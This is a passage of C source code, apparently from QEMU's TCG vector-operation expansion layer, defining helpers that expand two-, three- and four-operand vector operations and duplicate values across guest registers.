tcg_gen_ld_i32(tcg_ctx, t2, tcg_ctx->cpu_env, bofs + i); tcg_gen_ld_i32(tcg_ctx, t3, tcg_ctx->cpu_env, cofs + i); fni(tcg_ctx, t0, t1, t2, t3); tcg_gen_st_i32(tcg_ctx, t0, tcg_ctx->cpu_env, dofs + i); if (write_aofs) { tcg_gen_st_i32(tcg_ctx, t1, tcg_ctx->cpu_env, aofs + i); } } tcg_temp_free_i32(tcg_ctx, t3); tcg_temp_free_i32(tcg_ctx, t2); tcg_temp_free_i32(tcg_ctx, t1); tcg_temp_free_i32(tcg_ctx, t0); } /* Expand OPSZ bytes worth of two-operand operations using i64 elements. */ static void expand_2_i64(TCGContext *tcg_ctx, uint32_t dofs, uint32_t aofs, uint32_t oprsz, void (*fni)(TCGContext *, TCGv_i64, TCGv_i64)) { TCGv_i64 t0 = tcg_temp_new_i64(tcg_ctx); uint32_t i; for (i = 0; i < oprsz; i += 8) { tcg_gen_ld_i64(tcg_ctx, t0, tcg_ctx->cpu_env, aofs + i); fni(tcg_ctx, t0, t0); tcg_gen_st_i64(tcg_ctx, t0, tcg_ctx->cpu_env, dofs + i); } tcg_temp_free_i64(tcg_ctx, t0); } static void expand_2i_i64(TCGContext *tcg_ctx, uint32_t dofs, uint32_t aofs, uint32_t oprsz, int64_t c, bool load_dest, void (*fni)(TCGContext *, TCGv_i64, TCGv_i64, int64_t)) { TCGv_i64 t0 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 t1 = tcg_temp_new_i64(tcg_ctx); uint32_t i; for (i = 0; i < oprsz; i += 8) { tcg_gen_ld_i64(tcg_ctx, t0, tcg_ctx->cpu_env, aofs + i); if (load_dest) { tcg_gen_ld_i64(tcg_ctx, t1, tcg_ctx->cpu_env, dofs + i); } fni(tcg_ctx, t1, t0, c); tcg_gen_st_i64(tcg_ctx, t1, tcg_ctx->cpu_env, dofs + i); } tcg_temp_free_i64(tcg_ctx, t0); tcg_temp_free_i64(tcg_ctx, t1); } static void expand_2s_i64(TCGContext *tcg_ctx, uint32_t dofs, uint32_t aofs, uint32_t oprsz, TCGv_i64 c, bool scalar_first, void (*fni)(TCGContext *, TCGv_i64, TCGv_i64, TCGv_i64)) { TCGv_i64 t0 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 t1 = tcg_temp_new_i64(tcg_ctx); uint32_t i; for (i = 0; i < oprsz; i += 8) { tcg_gen_ld_i64(tcg_ctx, t0, tcg_ctx->cpu_env, aofs + i); if (scalar_first) { fni(tcg_ctx, t1, c, t0); } else { fni(tcg_ctx, t1, t0, c); } tcg_gen_st_i64(tcg_ctx, t1, tcg_ctx->cpu_env, dofs + i); } tcg_temp_free_i64(tcg_ctx, t0); tcg_temp_free_i64(tcg_ctx, t1); } /* Expand OPSZ bytes worth of three-operand operations using i64 elements. */ static void expand_3_i64(TCGContext *tcg_ctx, uint32_t dofs, uint32_t aofs, uint32_t bofs, uint32_t oprsz, bool load_dest, void (*fni)(TCGContext *, TCGv_i64, TCGv_i64, TCGv_i64)) { TCGv_i64 t0 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 t1 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 t2 = tcg_temp_new_i64(tcg_ctx); uint32_t i; for (i = 0; i < oprsz; i += 8) { tcg_gen_ld_i64(tcg_ctx, t0, tcg_ctx->cpu_env, aofs + i); tcg_gen_ld_i64(tcg_ctx, t1, tcg_ctx->cpu_env, bofs + i); if (load_dest) { tcg_gen_ld_i64(tcg_ctx, t2, tcg_ctx->cpu_env, dofs + i); } fni(tcg_ctx, t2, t0, t1); tcg_gen_st_i64(tcg_ctx, t2, tcg_ctx->cpu_env, dofs + i); } tcg_temp_free_i64(tcg_ctx, t2); tcg_temp_free_i64(tcg_ctx, t1); tcg_temp_free_i64(tcg_ctx, t0); } static void expand_3i_i64(TCGContext *tcg_ctx, uint32_t dofs, uint32_t aofs, uint32_t bofs, uint32_t oprsz, int64_t c, bool load_dest, void (*fni)(TCGContext *, TCGv_i64, TCGv_i64, TCGv_i64, int64_t)) { TCGv_i64 t0 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 t1 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 t2 = tcg_temp_new_i64(tcg_ctx); uint32_t i; for (i = 0; i < oprsz; i += 8) { tcg_gen_ld_i64(tcg_ctx, t0, tcg_ctx->cpu_env, aofs + i); tcg_gen_ld_i64(tcg_ctx, t1, tcg_ctx->cpu_env, bofs + i); if (load_dest) { tcg_gen_ld_i64(tcg_ctx, t2, tcg_ctx->cpu_env, dofs + i); } fni(tcg_ctx, t2, t0, t1, c); tcg_gen_st_i64(tcg_ctx, t2, tcg_ctx->cpu_env, dofs + i); } tcg_temp_free_i64(tcg_ctx, t0); tcg_temp_free_i64(tcg_ctx, t1); tcg_temp_free_i64(tcg_ctx, t2); } /* Expand OPSZ bytes worth of three-operand operations using i64 elements. */ static void expand_4_i64(TCGContext *tcg_ctx, uint32_t dofs, uint32_t aofs, uint32_t bofs, uint32_t cofs, uint32_t oprsz, bool write_aofs, void (*fni)(TCGContext *, TCGv_i64, TCGv_i64, TCGv_i64, TCGv_i64)) { TCGv_i64 t0 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 t1 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 t2 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 t3 = tcg_temp_new_i64(tcg_ctx); uint32_t i; for (i = 0; i < oprsz; i += 8) { tcg_gen_ld_i64(tcg_ctx, t1, tcg_ctx->cpu_env, aofs + i); tcg_gen_ld_i64(tcg_ctx, t2, tcg_ctx->cpu_env, bofs + i); tcg_gen_ld_i64(tcg_ctx, t3, tcg_ctx->cpu_env, cofs + i); fni(tcg_ctx, t0, t1, t2, t3); tcg_gen_st_i64(tcg_ctx, t0, tcg_ctx->cpu_env, dofs + i); if (write_aofs) { tcg_gen_st_i64(tcg_ctx, t1, tcg_ctx->cpu_env, aofs + i); } } tcg_temp_free_i64(tcg_ctx, t3); tcg_temp_free_i64(tcg_ctx, t2); tcg_temp_free_i64(tcg_ctx, t1); tcg_temp_free_i64(tcg_ctx, t0); } /* Expand OPSZ bytes worth of two-operand operations using host vectors. */ static void expand_2_vec(TCGContext *tcg_ctx, unsigned vece, uint32_t dofs, uint32_t aofs, uint32_t oprsz, uint32_t tysz, TCGType type, void (*fni)(TCGContext *, unsigned, TCGv_vec, TCGv_vec)) { TCGv_vec t0 = tcg_temp_new_vec(tcg_ctx, type); uint32_t i; for (i = 0; i < oprsz; i += tysz) { tcg_gen_ld_vec(tcg_ctx, t0, tcg_ctx->cpu_env, aofs + i); fni(tcg_ctx, vece, t0, t0); tcg_gen_st_vec(tcg_ctx, t0, tcg_ctx->cpu_env, dofs + i); } tcg_temp_free_vec(tcg_ctx, t0); } /* Expand OPSZ bytes worth of two-vector operands and an immediate operand using host vectors. */ static void expand_2i_vec(TCGContext *tcg_ctx, unsigned vece, uint32_t dofs, uint32_t aofs, uint32_t oprsz, uint32_t tysz, TCGType type, int64_t c, bool load_dest, void (*fni)(TCGContext *, unsigned, TCGv_vec, TCGv_vec, int64_t)) { TCGv_vec t0 = tcg_temp_new_vec(tcg_ctx, type); TCGv_vec t1 = tcg_temp_new_vec(tcg_ctx, type); uint32_t i; for (i = 0; i < oprsz; i += tysz) { tcg_gen_ld_vec(tcg_ctx, t0, tcg_ctx->cpu_env, aofs + i); if (load_dest) { tcg_gen_ld_vec(tcg_ctx, t1, tcg_ctx->cpu_env, dofs + i); } fni(tcg_ctx, vece, t1, t0, c); tcg_gen_st_vec(tcg_ctx, t1, tcg_ctx->cpu_env, dofs + i); } tcg_temp_free_vec(tcg_ctx, t0); tcg_temp_free_vec(tcg_ctx, t1); } static void expand_2s_vec(TCGContext *tcg_ctx, unsigned vece, uint32_t dofs, uint32_t aofs, uint32_t oprsz, uint32_t tysz, TCGType type, TCGv_vec c, bool scalar_first, void (*fni)(TCGContext *, unsigned, TCGv_vec, TCGv_vec, TCGv_vec)) { TCGv_vec t0 = tcg_temp_new_vec(tcg_ctx, type); TCGv_vec t1 = tcg_temp_new_vec(tcg_ctx, type); uint32_t i; for (i = 0; i < oprsz; i += tysz) { tcg_gen_ld_vec(tcg_ctx, t0, tcg_ctx->cpu_env, aofs + i); if (scalar_first) { fni(tcg_ctx, vece, t1, c, t0); } else { fni(tcg_ctx, vece, t1, t0, c); } tcg_gen_st_vec(tcg_ctx, t1, tcg_ctx->cpu_env, dofs + i); } tcg_temp_free_vec(tcg_ctx, t0); tcg_temp_free_vec(tcg_ctx, t1); } /* Expand OPSZ bytes worth of three-operand operations using host vectors. */ static void expand_3_vec(TCGContext *tcg_ctx, unsigned vece, uint32_t dofs, uint32_t aofs, uint32_t bofs, uint32_t oprsz, uint32_t tysz, TCGType type, bool load_dest, void (*fni)(TCGContext *, unsigned, TCGv_vec, TCGv_vec, TCGv_vec)) { TCGv_vec t0 = tcg_temp_new_vec(tcg_ctx, type); TCGv_vec t1 = tcg_temp_new_vec(tcg_ctx, type); TCGv_vec t2 = tcg_temp_new_vec(tcg_ctx, type); uint32_t i; for (i = 0; i < oprsz; i += tysz) { tcg_gen_ld_vec(tcg_ctx, t0, tcg_ctx->cpu_env, aofs + i); tcg_gen_ld_vec(tcg_ctx, t1, tcg_ctx->cpu_env, bofs + i); if (load_dest) { tcg_gen_ld_vec(tcg_ctx, t2, tcg_ctx->cpu_env, dofs + i); } fni(tcg_ctx, vece, t2, t0, t1); tcg_gen_st_vec(tcg_ctx, t2, tcg_ctx->cpu_env, dofs + i); } tcg_temp_free_vec(tcg_ctx, t2); tcg_temp_free_vec(tcg_ctx, t1); tcg_temp_free_vec(tcg_ctx, t0); } /* * Expand OPSZ bytes worth of three-vector operands and an immediate operand * using host vectors. */ static void expand_3i_vec(TCGContext *tcg_ctx, unsigned vece, uint32_t dofs, uint32_t aofs, uint32_t bofs, uint32_t oprsz, uint32_t tysz, TCGType type, int64_t c, bool load_dest, void (*fni)(TCGContext *, unsigned, TCGv_vec, TCGv_vec, TCGv_vec, int64_t)) { TCGv_vec t0 = tcg_temp_new_vec(tcg_ctx, type); TCGv_vec t1 = tcg_temp_new_vec(tcg_ctx, type); TCGv_vec t2 = tcg_temp_new_vec(tcg_ctx, type); uint32_t i; for (i = 0; i < oprsz; i += tysz) { tcg_gen_ld_vec(tcg_ctx, t0, tcg_ctx->cpu_env, aofs + i); tcg_gen_ld_vec(tcg_ctx, t1, tcg_ctx->cpu_env, bofs + i); if (load_dest) { tcg_gen_ld_vec(tcg_ctx, t2, tcg_ctx->cpu_env, dofs + i); } fni(tcg_ctx, vece, t2, t0, t1, c); tcg_gen_st_vec(tcg_ctx, t2, tcg_ctx->cpu_env, dofs + i); } tcg_temp_free_vec(tcg_ctx, t0); tcg_temp_free_vec(tcg_ctx, t1); tcg_temp_free_vec(tcg_ctx, t2); } /* Expand OPSZ bytes worth of four-operand operations using host vectors. */ static void expand_4_vec(TCGContext *tcg_ctx, unsigned vece, uint32_t dofs, uint32_t aofs, uint32_t bofs, uint32_t cofs, uint32_t oprsz, uint32_t tysz, TCGType type, bool write_aofs, void (*fni)(TCGContext *, unsigned, TCGv_vec, TCGv_vec, TCGv_vec, TCGv_vec)) { TCGv_vec t0 = tcg_temp_new_vec(tcg_ctx, type); TCGv_vec t1 = tcg_temp_new_vec(tcg_ctx, type); TCGv_vec t2 = tcg_temp_new_vec(tcg_ctx, type); TCGv_vec t3 = tcg_temp_new_vec(tcg_ctx, type); uint32_t i; for (i = 0; i < oprsz; i += tysz) { tcg_gen_ld_vec(tcg_ctx, t1, tcg_ctx->cpu_env, aofs + i); tcg_gen_ld_vec(tcg_ctx, t2, tcg_ctx->cpu_env, bofs + i); tcg_gen_ld_vec(tcg_ctx, t3, tcg_ctx->cpu_env, cofs + i); fni(tcg_ctx, vece, t0, t1, t2, t3); tcg_gen_st_vec(tcg_ctx, t0, tcg_ctx->cpu_env, dofs + i); if (write_aofs) { tcg_gen_st_vec(tcg_ctx, t1, tcg_ctx->cpu_env, aofs + i); } } tcg_temp_free_vec(tcg_ctx, t3); tcg_temp_free_vec(tcg_ctx, t2); tcg_temp_free_vec(tcg_ctx, t1); tcg_temp_free_vec(tcg_ctx, t0); } /* Expand a vector two-operand operation. */ void tcg_gen_gvec_2(TCGContext *tcg_ctx, uint32_t dofs, uint32_t aofs, uint32_t oprsz, uint32_t maxsz, const GVecGen2 *g) { const TCGOpcode *this_list = g->opt_opc ? g->opt_opc : vecop_list_empty; const TCGOpcode *hold_list = tcg_swap_vecop_list(this_list); TCGType type; uint32_t some; check_size_align(oprsz, maxsz, dofs | aofs); check_overlap_2(dofs, aofs, maxsz); type = 0; if (g->fniv) { type = choose_vector_type(tcg_ctx, g->opt_opc, g->vece, oprsz, g->prefer_i64); } switch (type) { case TCG_TYPE_V256: /* Recall that ARM SVE allows vector sizes that are not a * power of 2, but always a multiple of 16. The intent is * that e.g. size == 80 would be expanded with 2x32 + 1x16. */ some = QEMU_ALIGN_DOWN(oprsz, 32); expand_2_vec(tcg_ctx, g->vece, dofs, aofs, some, 32, TCG_TYPE_V256, g->fniv); if (some == oprsz) { break; } dofs += some; aofs += some; oprsz -= some; maxsz -= some; /* fallthru */ case TCG_TYPE_V128: expand_2_vec(tcg_ctx, g->vece, dofs, aofs, oprsz, 16, TCG_TYPE_V128, g->fniv); break; case TCG_TYPE_V64: expand_2_vec(tcg_ctx, g->vece, dofs, aofs, oprsz, 8, TCG_TYPE_V64, g->fniv); break; case 0: if (g->fni8 && check_size_impl(oprsz, 8)) { expand_2_i64(tcg_ctx, dofs, aofs, oprsz, g->fni8); } else if (g->fni4 && check_size_impl(oprsz, 4)) { expand_2_i32(tcg_ctx, dofs, aofs, oprsz, g->fni4); } else { assert(g->fno != NULL); tcg_gen_gvec_2_ool(tcg_ctx, dofs, aofs, oprsz, maxsz, g->data, g->fno); oprsz = maxsz; } break; default: g_assert_not_reached(); } tcg_swap_vecop_list(hold_list); if (oprsz < maxsz) { expand_clr(tcg_ctx, dofs + oprsz, maxsz - oprsz); } } /* Expand a vector operation with two vectors and an immediate. */ void tcg_gen_gvec_2i(TCGContext *tcg_ctx, uint32_t dofs, uint32_t aofs, uint32_t oprsz, uint32_t maxsz, int64_t c, const GVecGen2i *g) { const TCGOpcode *this_list = g->opt_opc ? g->opt_opc : vecop_list_empty; const TCGOpcode *hold_list = tcg_swap_vecop_list(this_list); TCGType type; uint32_t some; check_size_align(oprsz, maxsz, dofs | aofs); check_overlap_2(dofs, aofs, maxsz); type = 0; if (g->fniv) { type = choose_vector_type(tcg_ctx, g->opt_opc, g->vece, oprsz, g->prefer_i64); } switch (type) { case TCG_TYPE_V256: /* Recall that ARM SVE allows vector sizes that are not a * power of 2, but always a multiple of 16. The intent is * that e.g. size == 80 would be expanded with 2x32 + 1x16. */ some = QEMU_ALIGN_DOWN(oprsz, 32); expand_2i_vec(tcg_ctx, g->vece, dofs, aofs, some, 32, TCG_TYPE_V256, c, g->load_dest, g->fniv); if (some == oprsz) { break; } dofs += some; aofs += some; oprsz -= some; maxsz -= some; /* fallthru */ case TCG_TYPE_V128: expand_2i_vec(tcg_ctx, g->vece, dofs, aofs, oprsz, 16, TCG_TYPE_V128, c, g->load_dest, g->fniv); break; case TCG_TYPE_V64: expand_2i_vec(tcg_ctx, g->vece, dofs, aofs, oprsz, 8, TCG_TYPE_V64, c, g->load_dest, g->fniv); break; case 0: if (g->fni8 && check_size_impl(oprsz, 8)) { expand_2i_i64(tcg_ctx, dofs, aofs, oprsz, c, g->load_dest, g->fni8); } else if (g->fni4 && check_size_impl(oprsz, 4)) { expand_2i_i32(tcg_ctx, dofs, aofs, oprsz, c, g->load_dest, g->fni4); } else { if (g->fno) { tcg_gen_gvec_2_ool(tcg_ctx, dofs, aofs, oprsz, maxsz, c, g->fno); } else { TCGv_i64 tcg_c = tcg_const_i64(tcg_ctx, c); tcg_gen_gvec_2i_ool(tcg_ctx, dofs, aofs, tcg_c, oprsz, maxsz, c, g->fnoi); tcg_temp_free_i64(tcg_ctx, tcg_c); } oprsz = maxsz; } break; default: g_assert_not_reached(); } tcg_swap_vecop_list(hold_list); if (oprsz < maxsz) { expand_clr(tcg_ctx, dofs + oprsz, maxsz - oprsz); } } /* Expand a vector operation with two vectors and a scalar. */ void tcg_gen_gvec_2s(TCGContext *tcg_ctx, uint32_t dofs, uint32_t aofs, uint32_t oprsz, uint32_t maxsz, TCGv_i64 c, const GVecGen2s *g) { TCGType type; check_size_align(oprsz, maxsz, dofs | aofs); check_overlap_2(dofs, aofs, maxsz); type = 0; if (g->fniv) { type = choose_vector_type(tcg_ctx, g->opt_opc, g->vece, oprsz, g->prefer_i64); } if (type != 0) { const TCGOpcode *this_list = g->opt_opc ? g->opt_opc : vecop_list_empty; const TCGOpcode *hold_list = tcg_swap_vecop_list(this_list); TCGv_vec t_vec = tcg_temp_new_vec(tcg_ctx, type); uint32_t some; tcg_gen_dup_i64_vec(tcg_ctx, g->vece, t_vec, c); switch (type) { case TCG_TYPE_V256: /* Recall that ARM SVE allows vector sizes that are not a * power of 2, but always a multiple of 16. The intent is * that e.g. size == 80 would be expanded with 2x32 + 1x16. */ some = QEMU_ALIGN_DOWN(oprsz, 32); expand_2s_vec(tcg_ctx, g->vece, dofs, aofs, some, 32, TCG_TYPE_V256, t_vec, g->scalar_first, g->fniv); if (some == oprsz) { break; } dofs += some; aofs += some; oprsz -= some; maxsz -= some; /* fallthru */ case TCG_TYPE_V128: expand_2s_vec(tcg_ctx, g->vece, dofs, aofs, oprsz, 16, TCG_TYPE_V128, t_vec, g->scalar_first, g->fniv); break; case TCG_TYPE_V64: expand_2s_vec(tcg_ctx, g->vece, dofs, aofs, oprsz, 8, TCG_TYPE_V64, t_vec, g->scalar_first, g->fniv); break; default: g_assert_not_reached(); } tcg_temp_free_vec(tcg_ctx, t_vec); tcg_swap_vecop_list(hold_list); } else if (g->fni8 && check_size_impl(oprsz, 8)) { TCGv_i64 t64 = tcg_temp_new_i64(tcg_ctx); gen_dup_i64(tcg_ctx, g->vece, t64, c); expand_2s_i64(tcg_ctx, dofs, aofs, oprsz, t64, g->scalar_first, g->fni8); tcg_temp_free_i64(tcg_ctx, t64); } else if (g->fni4 && check_size_impl(oprsz, 4)) { TCGv_i32 t32 = tcg_temp_new_i32(tcg_ctx); tcg_gen_extrl_i64_i32(tcg_ctx, t32, c); gen_dup_i32(tcg_ctx, g->vece, t32, t32); expand_2s_i32(tcg_ctx, dofs, aofs, oprsz, t32, g->scalar_first, g->fni4); tcg_temp_free_i32(tcg_ctx, t32); } else { tcg_gen_gvec_2i_ool(tcg_ctx, dofs, aofs, c, oprsz, maxsz, 0, g->fno); return; } if (oprsz < maxsz) { expand_clr(tcg_ctx, dofs + oprsz, maxsz - oprsz); } } /* Expand a vector three-operand operation. */ void tcg_gen_gvec_3(TCGContext *tcg_ctx, uint32_t dofs, uint32_t aofs, uint32_t bofs, uint32_t oprsz, uint32_t maxsz, const GVecGen3 *g) { const TCGOpcode *this_list = g->opt_opc ? g->opt_opc : vecop_list_empty; const TCGOpcode *hold_list = tcg_swap_vecop_list(this_list); TCGType type; uint32_t some; check_size_align(oprsz, maxsz, dofs | aofs | bofs); check_overlap_3(dofs, aofs, bofs, maxsz); type = 0; if (g->fniv) { type = choose_vector_type(tcg_ctx, g->opt_opc, g->vece, oprsz, g->prefer_i64); } switch (type) { case TCG_TYPE_V256: /* Recall that ARM SVE allows vector sizes that are not a * power of 2, but always a multiple of 16. The intent is * that e.g. size == 80 would be expanded with 2x32 + 1x16. */ some = QEMU_ALIGN_DOWN(oprsz, 32); expand_3_vec(tcg_ctx, g->vece, dofs, aofs, bofs, some, 32, TCG_TYPE_V256, g->load_dest, g->fniv); if (some == oprsz) { break; } dofs += some; aofs += some; bofs += some; oprsz -= some; maxsz -= some; /* fallthru */ case TCG_TYPE_V128: expand_3_vec(tcg_ctx, g->vece, dofs, aofs, bofs, oprsz, 16, TCG_TYPE_V128, g->load_dest, g->fniv); break; case TCG_TYPE_V64: expand_3_vec(tcg_ctx, g->vece, dofs, aofs, bofs, oprsz, 8, TCG_TYPE_V64, g->load_dest, g->fniv); break; case 0: if (g->fni8 && check_size_impl(oprsz, 8)) { expand_3_i64(tcg_ctx, dofs, aofs, bofs, oprsz, g->load_dest, g->fni8); } else if (g->fni4 && check_size_impl(oprsz, 4)) { expand_3_i32(tcg_ctx, dofs, aofs, bofs, oprsz, g->load_dest, g->fni4); } else { assert(g->fno != NULL); tcg_gen_gvec_3_ool(tcg_ctx, dofs, aofs, bofs, oprsz, maxsz, g->data, g->fno); oprsz = maxsz; } break; default: g_assert_not_reached(); } tcg_swap_vecop_list(hold_list); if (oprsz < maxsz) { expand_clr(tcg_ctx, dofs + oprsz, maxsz - oprsz); } } /* Expand a vector operation with three vectors and an immediate. */ void tcg_gen_gvec_3i(TCGContext *tcg_ctx, uint32_t dofs, uint32_t aofs, uint32_t bofs, uint32_t oprsz, uint32_t maxsz, int64_t c, const GVecGen3i *g) { const TCGOpcode *this_list = g->opt_opc ? g->opt_opc : vecop_list_empty; const TCGOpcode *hold_list = tcg_swap_vecop_list(this_list); TCGType type; uint32_t some; check_size_align(oprsz, maxsz, dofs | aofs | bofs); check_overlap_3(dofs, aofs, bofs, maxsz); type = 0; if (g->fniv) { type = choose_vector_type(tcg_ctx, g->opt_opc, g->vece, oprsz, g->prefer_i64); } switch (type) { case TCG_TYPE_V256: /* * Recall that ARM SVE allows vector sizes that are not a * power of 2, but always a multiple of 16. The intent is * that e.g. size == 80 would be expanded with 2x32 + 1x16. */ some = QEMU_ALIGN_DOWN(oprsz, 32); expand_3i_vec(tcg_ctx, g->vece, dofs, aofs, bofs, some, 32, TCG_TYPE_V256, c, g->load_dest, g->fniv); if (some == oprsz) { break; } dofs += some; aofs += some; bofs += some; oprsz -= some; maxsz -= some; /* fallthru */ case TCG_TYPE_V128: expand_3i_vec(tcg_ctx, g->vece, dofs, aofs, bofs, oprsz, 16, TCG_TYPE_V128, c, g->load_dest, g->fniv); break; case TCG_TYPE_V64: expand_3i_vec(tcg_ctx, g->vece, dofs, aofs, bofs, oprsz, 8, TCG_TYPE_V64, c, g->load_dest, g->fniv); break; case 0: if (g->fni8 && check_size_impl(oprsz, 8)) { expand_3i_i64(tcg_ctx, dofs, aofs, bofs, oprsz, c, g->load_dest, g->fni8); } else if (g->fni4 && check_size_impl(oprsz, 4)) { expand_3i_i32(tcg_ctx, dofs, aofs, bofs, oprsz, c, g->load_dest, g->fni4); } else { assert(g->fno != NULL); tcg_gen_gvec_3_ool(tcg_ctx, dofs, aofs, bofs, oprsz, maxsz, c, g->fno); oprsz = maxsz; } break; default: g_assert_not_reached(); } tcg_swap_vecop_list(hold_list); if (oprsz < maxsz) { expand_clr(tcg_ctx, dofs + oprsz, maxsz - oprsz); } } /* Expand a vector four-operand operation. */ void tcg_gen_gvec_4(TCGContext *tcg_ctx, uint32_t dofs, uint32_t aofs, uint32_t bofs, uint32_t cofs, uint32_t oprsz, uint32_t maxsz, const GVecGen4 *g) { const TCGOpcode *this_list = g->opt_opc ? g->opt_opc : vecop_list_empty; const TCGOpcode *hold_list = tcg_swap_vecop_list(this_list); TCGType type; uint32_t some; check_size_align(oprsz, maxsz, dofs | aofs | bofs | cofs); check_overlap_4(dofs, aofs, bofs, cofs, maxsz); type = 0; if (g->fniv) { type = choose_vector_type(tcg_ctx, g->opt_opc, g->vece, oprsz, g->prefer_i64); } switch (type) { case TCG_TYPE_V256: /* Recall that ARM SVE allows vector sizes that are not a * power of 2, but always a multiple of 16. The intent is * that e.g. size == 80 would be expanded with 2x32 + 1x16. */ some = QEMU_ALIGN_DOWN(oprsz, 32); expand_4_vec(tcg_ctx, g->vece, dofs, aofs, bofs, cofs, some, 32, TCG_TYPE_V256, g->write_aofs, g->fniv); if (some == oprsz) { break; } dofs += some; aofs += some; bofs += some; cofs += some; oprsz -= some; maxsz -= some; /* fallthru */ case TCG_TYPE_V128: expand_4_vec(tcg_ctx, g->vece, dofs, aofs, bofs, cofs, oprsz, 16, TCG_TYPE_V128, g->write_aofs, g->fniv); break; case TCG_TYPE_V64: expand_4_vec(tcg_ctx, g->vece, dofs, aofs, bofs, cofs, oprsz, 8, TCG_TYPE_V64, g->write_aofs, g->fniv); break; case 0: if (g->fni8 && check_size_impl(oprsz, 8)) { expand_4_i64(tcg_ctx, dofs, aofs, bofs, cofs, oprsz, g->write_aofs, g->fni8); } else if (g->fni4 && check_size_impl(oprsz, 4)) { expand_4_i32(tcg_ctx, dofs, aofs, bofs, cofs, oprsz, g->write_aofs, g->fni4); } else { assert(g->fno != NULL); tcg_gen_gvec_4_ool(tcg_ctx, dofs, aofs, bofs, cofs, oprsz, maxsz, g->data, g->fno); oprsz = maxsz; } break; default: g_assert_not_reached(); } tcg_swap_vecop_list(hold_list); if (oprsz < maxsz) { expand_clr(tcg_ctx, dofs + oprsz, maxsz - oprsz); } } /* * Expand specific vector operations. */ static void vec_mov2(TCGContext *tcg_ctx, unsigned vece, TCGv_vec a, TCGv_vec b) { tcg_gen_mov_vec(tcg_ctx, a, b); } void tcg_gen_gvec_mov(TCGContext *tcg_ctx, unsigned vece, uint32_t dofs, uint32_t aofs, uint32_t oprsz, uint32_t maxsz) { static const GVecGen2 g = { .fni8 = tcg_gen_mov_i64, .fniv = vec_mov2, .fno = gen_helper_gvec_mov, .prefer_i64 = TCG_TARGET_REG_BITS == 64, }; if (dofs != aofs) { tcg_gen_gvec_2(tcg_ctx, dofs, aofs, oprsz, maxsz, &g); } else { check_size_align(oprsz, maxsz, dofs); if (oprsz < maxsz) { expand_clr(tcg_ctx, dofs + oprsz, maxsz - oprsz); } } } void tcg_gen_gvec_dup_i32(TCGContext *tcg_ctx, unsigned vece, uint32_t dofs, uint32_t oprsz, uint32_t maxsz, TCGv_i32 in) { check_size_align(oprsz, maxsz, dofs); tcg_debug_assert(vece <= MO_32); do_dup(tcg_ctx, vece, dofs, oprsz, maxsz, in, NULL, 0); } void tcg_gen_gvec_dup_i64(TCGContext *tcg_ctx, unsigned vece, uint32_t dofs, uint32_t oprsz, uint32_t maxsz, TCGv_i64 in) { check_size_align(oprsz, maxsz, dofs); tcg_debug_assert(vece <= MO_64); do_dup(tcg_ctx, vece, dofs, oprsz, maxsz, NULL, in, 0); } void tcg_gen_gvec_dup_mem(TCGContext *tcg_ctx, unsigned vece, uint32_t dofs, uint32_t aofs, uint32_t oprsz, uint32_t maxsz) { check_size_align(oprsz, maxsz, dofs); if (vece <= MO_64) { TCGType type = choose_vector_type(tcg_ctx, NULL, vece, oprsz, 0); if (type != 0) { TCGv_vec t_vec = tcg_temp_new_vec(tcg_ctx, type); tcg_gen_dup_mem_vec(tcg_ctx, vece, t_vec, tcg_ctx->cpu_env, aofs); do_dup_store(tcg_ctx, type, dofs, oprsz, maxsz, t_vec); tcg_temp_free_vec(tcg_ctx, t_vec); } else if (vece <= MO_32) { TCGv_i32 in = tcg_temp_new_i32(tcg_ctx); switch (vece) { case MO_8: tcg_gen_ld8u_i32(tcg_ctx, in, tcg_ctx->cpu_env, aofs); break; case MO_16: tcg_gen_ld16u_i32(tcg_ctx, in, tcg_ctx->cpu_env, aofs); break; default: tcg_gen_ld_i32(tcg_ctx, in, tcg_ctx->cpu_env, aofs); break; } do_dup(tcg_ctx, vece, dofs, oprsz, maxsz, in, NULL, 0); tcg_temp_free_i32(tcg_ctx, in); } else { TCGv_i64 in = tcg_temp_new_i64(tcg_ctx); tcg_gen_ld_i64(tcg_ctx, in, tcg_ctx->cpu_env, aofs); do_dup(tcg_ctx, vece, dofs, oprsz, maxsz, NULL, in, 0); tcg_temp_free_i64(tcg_ctx, in); } } else { /* 128-bit duplicate. */ /* ??? Dup to 256-bit vector. */ int i; tcg_debug_assert(vece == 4); tcg_debug_assert(oprsz >= 16); if (TCG_TARGET_HAS_v128) { TCGv_vec in = tcg_temp_new_vec(tcg_ctx, TCG_TYPE_V128); tcg_gen_ld_vec(tcg_ctx, in, tcg_ctx->cpu_env, aofs); for (i = 0; i < oprsz; i += 16) { tcg_gen_st_vec(tcg_ctx, in, tcg_ctx->cpu_env, dofs + i); } tcg_temp_free_vec(tcg_ctx, in); } else { TCGv_i64 in0 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 in1 = tcg_temp_new_i64(tcg_ctx); tcg_gen_ld_i64(tcg_ctx, in0, tcg_ctx->cpu_env, aofs); tcg_gen_ld_i64(tcg_ctx, in1, tcg_ctx->cpu_env, aofs + 8); for (i = 0; i < oprsz; i += 16) { tcg_gen_st_i64(tcg_ctx, in0, tcg_ctx->cpu_env, dofs + i); tcg_gen_st_i64(tcg_ctx, in1, tcg_ctx->cpu_env, dofs + i + 8); } tcg_temp_free_i64(tcg_ctx, in0); tcg_temp_free_i64(tcg_ctx, in1); } if (oprsz < maxsz) { expand_clr(tcg_ctx, dofs + oprsz, maxsz - oprsz); } } } void tcg_gen_gvec_dup64i(TCGContext *tcg_ctx, uint32_t dofs, uint32_t oprsz, uint32_t maxsz, uint64_t x) { check_size_align(oprsz, maxsz, dofs); do_dup(tcg_ctx, MO_64, dofs, oprsz, maxsz, NULL, NULL, x); } void tcg_gen_gvec_dup32i(TCGContext *tcg_ctx, uint32_t dofs, uint32_t oprsz, uint32_t maxsz, uint32_t x) { check_size_align(oprsz, maxsz, dofs); do_dup(tcg_ctx, MO_32, dofs, oprsz, maxsz, NULL, NULL, x); } void tcg_gen_gvec_dup16i(TCGContext *tcg_ctx, uint32_t dofs, uint32_t oprsz, uint32_t maxsz, uint16_t x) { check_size_align(oprsz, maxsz, dofs); 